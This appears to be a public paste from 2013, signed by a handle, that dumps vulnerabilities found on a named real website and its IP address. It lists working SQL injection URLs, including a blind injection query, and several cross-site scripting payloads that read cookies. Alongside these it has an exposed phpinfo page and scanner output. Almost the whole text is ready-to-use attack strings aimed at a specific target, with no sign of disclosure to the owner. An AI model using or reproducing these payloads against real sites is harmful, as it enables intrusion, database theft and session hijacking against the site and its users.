supermanavc

bemstar.globo.com

Apr 15th, 2013
BEMSTAR.GLOBO.COM - SUP3RM4N
---------------------------------------------------------------------------
+ Target IP: 201.7.176.72
+ Target Hostname: bemstar.globo.com
+ Target Port: 80
+ Start Time: 2013-04-15 21:28:06 (GMT-3)
---------------------------------------------------------------------------

VUL BOOLEAN BASED IN SQL INJECTION:http://bemstar.globo.com/bem2/index.php?modulo=fique&tipo=-1+OR+17-7%3d10

Error:http://bemstar.globo.com/bem2/includes/corpoevida_mat.inc.php?id=1

Programming error msg:http://bemstar.globo.com/bem2/index.php?modulo=colunistas_mat&url_n_art=44&url_col=Dr.+Osmar+de+Oliveira%20And%20(Select%201)=1

Blind sql db found:http://bemstar.globo.com/bem2/index.php?modulo=fique&tipo=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--

XSS:http://bemstar.globo.com/index.php/%22%3E%3Cscript%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C

PHPINFO:http://bemstar.globo.com/phpinfo.php

SERVER LEAK:http://bemstar.globo.com/icons/README

PHPINFO XSS COOKIE ATTACK:http://bemstar.globo.com/phpinfo.php?GLOBALS[test]=%3Cscript%3Ealert(document.cookie);%3C/script%3E

+ Server: No banner retrieved
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-20406: /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: PHP contains a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: /phpinfo.php?cx[]=[long filler string omitted]<script>alert(foo)</script>: PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 199917, size: 4872, mtime: 0x41a4dc9b
+ OSVDB-3233: /icons/README: Apache default file found.

#SUP3RM4N